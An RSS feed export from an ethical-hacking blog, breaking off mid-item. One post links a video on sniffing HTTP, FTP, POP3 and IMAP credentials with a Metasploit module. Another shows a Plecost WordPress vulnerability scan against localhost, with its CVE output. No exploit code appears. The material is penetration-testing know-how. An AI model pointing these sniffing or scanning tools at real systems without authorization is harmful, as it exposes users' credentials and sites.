<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-3964176871415674890</atom:id><lastBuildDate>Mon, 28 May 2012 04:21:30 +0000</lastBuildDate><category>iKAT</category><category>Course</category><category>DNSenum</category><category>AntiVirus</category><category>Slides</category><category>Cisco Career Certifications</category><category>ATM</category><category>DNS</category><category>Social engineer</category><category>SQL</category><category>Youtube</category><category>EMET</category><category>Droidsheep</category><category>Inguma</category><category>Spoofing</category><category>Tabnapping</category><category>XSSF</category><category>ZAP</category><category>Network security</category><category>Nexpose</category><category>EH Tools</category><category>Cisco</category><category>PTK</category><category>Nmap</category><category>Windows</category><category>Kismet</category><category>Radware</category><category>GnackTrack</category><category>VPN</category><category>Rootkit</category><category>Karmetasploit</category><category>Forensic</category><category>SMS spoofing</category><category>SqlNinja</category><category>Fuzzer</category><category>Vulnerability</category><category>Armitage</category><category>Netsparker</category><category>Guest Post</category><category>Websurgery</category><category>Apache</category><category>Sandcat</category><category>Pentbox</category><category>Services</category><category>Rogue Access Point</category><category>News</category><category>WATOBO</category><category>AppWall</category><category>IOS (Apple)</category><category>DOM XSS</category><category>Virtual Machine</category><category>IPv6</category><category>OpenVAS</category><category>SSH</category><category>WPA</category><category>Cracking</category><category>iExploder</category><category>Aircrack-ng</category><category>Asterisk</category><category>Metasploit</category><category>Fast-Track</category><category>Mantra</category><category>nikto</category><category>Websecurify</category><category>Blogger</category><category>Challenge</category><category>Maltego</category><category>Wapiti</category><category>Drupal</category><category>Pangolin</category><category>VoIP</category><category>Infosec</category><category>darkjumper</category><category>Firefox</category><category>SQLsus</category><category>VMware</category><category>PolarSSL</category><category>UbuntuME</category><category>ClickJacking</category><category>Man-In-The-Middle-Attack</category><category>USB hacks</category><category>RootRepeal</category><category>WP Security Scan</category><category>Joomscan</category><category>Volatility</category><category>Data security</category><category>Firesheep</category><category>inSSIDer</category><category>WebCruiser</category><category>VNC</category><category>Hacking</category><category>Backtrack5</category><category>Hotfile Hack</category><category>Trixbox</category><category>Skipfish</category><category>XSS</category><category>OpenSSH</category><category>Event</category><category>SOPA</category><category>Viruses</category><category>BackTrack</category><category>Bugtraq</category><category>Random</category><category>Wireless</category><category>Twitter</category><category>IDS</category><category>Ettercap</category><category>Nessus</category><category>Firefuzzer</category><category>SEO poisoning</category><category>SSL Strip</category><category>Retina</category><category>Review</category><category>OpenSSL</category><category>RedWolf</category><category>Gamja</category><category>Anonymous</category><category>wardriving</category><category>Lulzsec</category><category>Tutorial</category><category>Firewall</category><category>BSD</category><category>MAC</category><category>Sabily</category><category>Rapidshare Hack</category><category>Server Security</category><category>Plagiarism</category><category>Chrome</category><category>Framework</category><category>Backbox</category><category>KisMAC</category><category>EH Tips</category><category>Hexjector</category><category>Smartphone</category><category>sslyze</category><category>Federal Bureau of Investigation</category><category>SSL</category><category>Tamper Data</category><category>Spanish</category><category>Elearning</category><category>SET</category><category>Ncrack</category><category>Android</category><category>Paros Proxy</category><category>Facebook</category><category>Patator</category><category>Scam Alert</category><category>Blackbuntu</category><category>Anonymouse</category><category>Keylogger</category><category>Pen-Testing</category><category>Airsnarf</category><category>Netcat</category><category>wpscan</category><category>Burpsuite</category><category>WordPress</category><category>ARPspoof</category><category>BlueTooth</category><category>PTM</category><category>Infondlinux</category><category>CIPPT</category><category>Exploit</category><category>BlackBerry</category><category>Metagoofil</category><category>Infography</category><category>Sniffing</category><category>Ebook</category><category>Open Source</category><category>Inverse Wardriving</category><category>DEFT</category><category>EH Security</category><category>Malware</category><category>Conferences</category><category>TheHarvester</category><category>BeEF</category><category>Linux</category><category>Proxy</category><category>Web Security</category><category>Safe3SI</category><category>IE</category><category>Ubuntu</category><category>Virtualbox</category><category>Antisec Movement</category><category>Havij</category><category>DOS</category><title>Ethical Hacking-Your Way To The World Of IT Security</title><description>Ethical Hacking is the best place to learn and practice hacking in ethical way. Learn about IT security with some tips and tricks including various operating system</description><link>http://www.ehacking.net/</link><managingEditor>noreply@blogger.com (Irfan Shakeel)</managingEditor><generator>Blogger</generator><openSearch:totalResults>337</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/ehacking" /><feedburner:info uri="ehacking" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><feedburner:emailServiceId>ehacking</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3964176871415674890.post-1749550057751275688</guid><pubDate>Sun, 27 May 2012 11:24:00 +0000</pubDate><atom:updated>2012-05-27T04:25:17.752-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutorial</category><category domain="http://www.blogger.com/atom/ns#">Pen-Testing</category><category domain="http://www.blogger.com/atom/ns#">EH Security</category><category domain="http://www.blogger.com/atom/ns#">Linux</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">EH Tools</category><category domain="http://www.blogger.com/atom/ns#">Metasploit</category><category domain="http://www.blogger.com/atom/ns#">Backtrack5</category><title>Credentials Sniffing Psnuffle Metasploit Tutorial</title><description>&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/IZmS5IlDKyNVQFU2BYSNMqZTHlw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/IZmS5IlDKyNVQFU2BYSNMqZTHlw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/IZmS5IlDKyNVQFU2BYSNMqZTHlw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/IZmS5IlDKyNVQFU2BYSNMqZTHlw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div dir="ltr" style="font-family: inherit; text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.ehacking.net/2012/05/credentials-sniffing-psnuffle.html" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="180" src="http://1.bp.blogspot.com/-xw0UjVwO-ww/T8IMhZ_8LkI/AAAAAAAABL4/v3rAx89JD24/s200/metasploit.jpg" width="220" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Metasploit is a very powerful penetration testing software and framework, metasploit has so many exploits and auxiliary modules that can perform so many tasks. There are so many auxiliary modules are available and this is the video tutorial made by mAx and I am just sharing the video tutorial. The video is the demonstration of credential sniffing via metasploit Psnuffle auxiliary module.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Psnuffles metasploit auxiliary module is able to sniff the credentials of HTTP,FTP,POP3 and IMAP. So below is the video do not forger to share in via your social media profiles.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: center;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="font-family: inherit; text-align: center;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;iframe allowfullscreen="" frameborder="0" height="350" mozallowfullscreen="" src="http://player.vimeo.com/video/6013518" webkitallowfullscreen="" width="550"&gt;&lt;/iframe&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div dir="ltr" style="font-family: inherit; text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;
&lt;/script&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;fb:like href="http://www.ehacking.net/" show_faces="true" width="450"&gt;&lt;/fb:like&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="color: red;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our &lt;a href="http://feeds.feedburner.com/ehacking"&gt;RSS feed&lt;/a&gt; and &lt;a href="http://feedburner.google.com/fb/a/mailverify?uri=ehacking&amp;amp;loc=en_US"&gt;Email Subscription&lt;/a&gt;&amp;nbsp; or become our &lt;a href="http://www.facebook.com/Beautyofthebaud"&gt;Facebook fan&lt;/a&gt;! You will get all the latest updates at both the places.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3964176871415674890-1749550057751275688?l=www.ehacking.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=okBxsAa-vsM:38MT6C3l1Vg:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=okBxsAa-vsM:38MT6C3l1Vg:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=okBxsAa-vsM:38MT6C3l1Vg:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=okBxsAa-vsM:38MT6C3l1Vg:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=okBxsAa-vsM:38MT6C3l1Vg:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=okBxsAa-vsM:38MT6C3l1Vg:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=okBxsAa-vsM:38MT6C3l1Vg:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=okBxsAa-vsM:38MT6C3l1Vg:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=okBxsAa-vsM:38MT6C3l1Vg:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=okBxsAa-vsM:38MT6C3l1Vg:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=okBxsAa-vsM:38MT6C3l1Vg:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=okBxsAa-vsM:38MT6C3l1Vg:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=okBxsAa-vsM:38MT6C3l1Vg:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ehacking/~4/okBxsAa-vsM" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ehacking/~3/okBxsAa-vsM/credentials-sniffing-psnuffle.html</link><author>noreply@blogger.com (Irfan Shakeel)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-xw0UjVwO-ww/T8IMhZ_8LkI/AAAAAAAABL4/v3rAx89JD24/s72-c/metasploit.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ehacking.net/2012/05/credentials-sniffing-psnuffle.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3964176871415674890.post-7896408536587284088</guid><pubDate>Thu, 24 May 2012 15:12:00 +0000</pubDate><atom:updated>2012-05-24T08:13:19.549-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutorial</category><category domain="http://www.blogger.com/atom/ns#">Pen-Testing</category><category domain="http://www.blogger.com/atom/ns#">Infosec</category><category domain="http://www.blogger.com/atom/ns#">Linux</category><category domain="http://www.blogger.com/atom/ns#">Vulnerability</category><category domain="http://www.blogger.com/atom/ns#">EH Tools</category><category domain="http://www.blogger.com/atom/ns#">EH Tips</category><category domain="http://www.blogger.com/atom/ns#">WP Security Scan</category><category domain="http://www.blogger.com/atom/ns#">Guest Post</category><category domain="http://www.blogger.com/atom/ns#">WordPress</category><title>Wordpress Security - Vulnerability Scanning</title><description>&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/TxzndXCAnwLz3_WCHATRJdyomAE/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/TxzndXCAnwLz3_WCHATRJdyomAE/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/TxzndXCAnwLz3_WCHATRJdyomAE/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/TxzndXCAnwLz3_WCHATRJdyomAE/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.ehacking.net/2012/05/wordpress-security-vulnerability.html" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;" target="_blank"&gt;&lt;img border="0" height="180" src="http://4.bp.blogspot.com/-ZXwa0sMuw9o/T75PJqSItRI/AAAAAAAABLs/nIOlsohy7Ok/s200/wordpress-security.jpg" width="220" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;WordPress is one of the best and most popular content management system (CMS) among bloggers and there are a lot of bloggers using WordPress as a CMS. Wordpress is on the hit list of the hackers and spammers, spammers use their malware to compromise a wordpress website that is why &lt;a href="http://infosecinstitute.com/courses/reverse_engineering_training.html" style="color: blue;" target="_blank"&gt;reverse engineering&lt;/a&gt; of malware is necessary.&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;However there are other CMS available, like Joomla!, but WordPress 
has its own importance and market. Since most bloggers are using 
WordPress the security is also important and a single dangerous 
vulnerability may lead to thousands of compromised WordPress blogs. From
 the penetration tester point-of-view an administrator must be aware at 
the system level, as well as the application level, of existing 
vulnerabilities in order to protect these website(s).&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;div style="color: red; font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/blockquote&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;blockquote&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;a href="http://www.ehacking.net/p/wordpress-security-vulnerability.html" style="color: red;" target="_blank"&gt;We provide our services to secure a wordpress website / blog more information. &lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/blockquote&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;A quick tip 
to secure a WordPress (or any other) blog from the system/server 
software vulnerability is by auditing. This includes keeping up-to-date 
all the server’s software, browsers, anti-virus, using strong passwords 
and changing them very often, scanning the server for malware and 
backdoors, using firewalls, etc.,. WordPress software itself has 
different vulnerabilities; in fact security researchers discover new 
vulnerabilities on a daily basis.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;So in this article we will cover
 some tools and plug-ins to audit WordPress software for security holes 
and vulnerabilities. We will also discuss the possible ways and tools 
that an attacker might use to hack into WordPress, and some of the best 
way(s) to secure a WordPress blog.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;h4 style="color: blue; font-family: inherit; text-align: center;"&gt;



&lt;span style="font-size: large;"&gt;&lt;b&gt;WordPress Security Audit &amp;amp; Vulnerability Scanning&lt;/b&gt;&lt;/span&gt;&lt;/h4&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;A
 security audit is one of the most important steps to finding possible 
vulnerabilities in WordPress and in this section I will discuss some 
tools and plug-ins you can use to find them.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;h2 style="font-family: inherit; text-align: center;"&gt;



&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: large;"&gt;&lt;span style="color: blue;"&gt;Plecost WordPress Fingerprinting Tool:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/h2&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;Plecost
 is a wonderful tool to audit a WordPress blog and it is available by 
default on the most famous penetration test tools i.e., Backtrack, 
Backbox and Blackbuntu. Plecost contains a database of available 
plug-ins and compares them against the common vulnerability and exposure
 (CVE) list to verify its vulnerability on WordPress.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;Plecost can 
work in two modes – either by auditing the security of a single targeted
 URL or Google search results.  Our goal is to audit a single URL.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;img alt="" src="http://resources.infosecinstitute.com/wp-content/uploads/021412_0643_WordPressSe1.jpg?d9c344" /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;Here is the result of a quick and a simple audit on WordPress using Plecost.&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b style="color: #444444;"&gt;root@bt:/pentest/web/scanners/plecost# ./plecost-0.2.2-9-beta.py -i wp_plugin_list.txt -c http://127.0.0.1/wordpress&lt;br /&gt;&lt;br /&gt;-------------------------------------------------&lt;br /&gt;&lt;br /&gt;[*] Input plugin list set to: wp_plugin_list.txt&lt;br /&gt;&lt;br /&gt;[*] Colored output set on.&lt;br /&gt;&lt;br /&gt;-------------------------------------------------&lt;br /&gt;&lt;br /&gt;==&amp;gt; Results for: http://127.0.0.1/wordpress &amp;lt;==&lt;br /&gt;&lt;br /&gt;[i] WordPress version found: 3.3&lt;br /&gt;&lt;br /&gt;[i] WordPress last public version: 3.3.1&lt;br /&gt;&lt;br /&gt;[*] Search for installed plugins&lt;br /&gt;&lt;br /&gt;[i] Plugin found: akismet&lt;br /&gt;&lt;br /&gt;|_Latest version: 2.4.0&lt;br /&gt;&lt;br /&gt;|_ Installed version: 2.3.0&lt;br /&gt;&lt;br /&gt;|_CVE list:&lt;br /&gt;&lt;br /&gt;|___CVE-2009-2334: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2334)&lt;br /&gt;&lt;br /&gt;|___CVE-2007-2714: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2714)&lt;br /&gt;&lt;br /&gt;|___CVE-2006-4743: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4743)&lt;br /&gt;&lt;br /&gt;|___CVE-2009-2334: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2334)&lt;br /&gt;&lt;br /&gt;|___CVE-2007-2714: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2714)&lt;br /&gt;&lt;br /&gt;|___CVE-2006-4743: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4743)&lt;br /&gt;&lt;br /&gt;[i] Plugin found: wp-security-scan&lt;br /&gt;&lt;br /&gt;|_Latest version: 2.7.1.2&lt;br /&gt;&lt;br /&gt;|_ Installed version: trunk&lt;br /&gt;&lt;br /&gt;|_CVE list:&lt;br /&gt;&lt;br /&gt;|___CVE-2009-2334: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2334)&lt;br /&gt;&lt;br /&gt;|___CVE-2009-2334: (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2334)&lt;/b&gt;&lt;/div&gt;
&lt;/blockquote&gt;
&lt;div class="syntaxhighlighter nogutter  " id="highlighter_336739" style="font-family: inherit;"&gt;
&lt;div class="lines"&gt;
&lt;div class="line alt1"&gt;
&lt;table&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td class="content"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;&lt;code class="plain"&gt;&lt;/code&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;You
 can see that this WordPress software is outdated. The new version of 
WordPress is available and the new version of the plug-ins are also 
available, but they have not been updated. This is dangerous.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: small;"&gt;The next article of this series will be publish soon, do not forget to share this information.&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span class="st_twitter_large" displaytext="Tweet"&gt;&lt;/span&gt;&lt;span class="st_facebook_large" displaytext="Facebook"&gt;&lt;/span&gt;&lt;span class="st_ybuzz_large" displaytext="Yahoo! Buzz"&gt;&lt;/span&gt;&lt;span class="st_gbuzz_large" displaytext="Google Buzz"&gt;&lt;/span&gt;&lt;span class="st_email_large" displaytext="Email"&gt;&lt;/span&gt;&lt;span class="st_sharethis_large" displaytext="ShareThis"&gt;&lt;/span&gt;  
&lt;br /&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;
&lt;/script&gt;&lt;span style="font-size: small;"&gt;&lt;fb:like href="http://www.ehacking.net/" show_faces="true" width="450"&gt;&lt;/fb:like&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="color: red; font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our &lt;a href="http://feeds.feedburner.com/ehacking"&gt;&lt;b&gt;RSS feed&lt;/b&gt;&lt;/a&gt; and &lt;a href="http://feedburner.google.com/fb/a/mailverify?uri=ehacking&amp;amp;loc=en_US"&gt;Email Subscription&lt;/a&gt;&amp;nbsp; or become our &lt;a href="http://www.facebook.com/Beautyofthebaud"&gt;&lt;b&gt;Facebook fan&lt;/b&gt;&lt;/a&gt;! You will get all the latest updates at both the places.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3964176871415674890-7896408536587284088?l=www.ehacking.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=kOMA5kB5T_Q:nEvNfhCCmhs:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=kOMA5kB5T_Q:nEvNfhCCmhs:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=kOMA5kB5T_Q:nEvNfhCCmhs:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=kOMA5kB5T_Q:nEvNfhCCmhs:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=kOMA5kB5T_Q:nEvNfhCCmhs:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=kOMA5kB5T_Q:nEvNfhCCmhs:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=kOMA5kB5T_Q:nEvNfhCCmhs:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=kOMA5kB5T_Q:nEvNfhCCmhs:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=kOMA5kB5T_Q:nEvNfhCCmhs:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=kOMA5kB5T_Q:nEvNfhCCmhs:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=kOMA5kB5T_Q:nEvNfhCCmhs:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=kOMA5kB5T_Q:nEvNfhCCmhs:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=kOMA5kB5T_Q:nEvNfhCCmhs:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ehacking/~4/kOMA5kB5T_Q" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ehacking/~3/kOMA5kB5T_Q/wordpress-security-vulnerability.html</link><author>noreply@blogger.com (Irfan Shakeel)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-ZXwa0sMuw9o/T75PJqSItRI/AAAAAAAABLs/nIOlsohy7Ok/s72-c/wordpress-security.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ehacking.net/2012/05/wordpress-security-vulnerability.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3964176871415674890.post-6482011390089327581</guid><pubDate>Fri, 18 May 2012 19:49:00 +0000</pubDate><atom:updated>2012-05-18T12:49:50.579-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutorial</category><category domain="http://www.blogger.com/atom/ns#">Pen-Testing</category><category domain="http://www.blogger.com/atom/ns#">Linux</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Metasploit</category><category 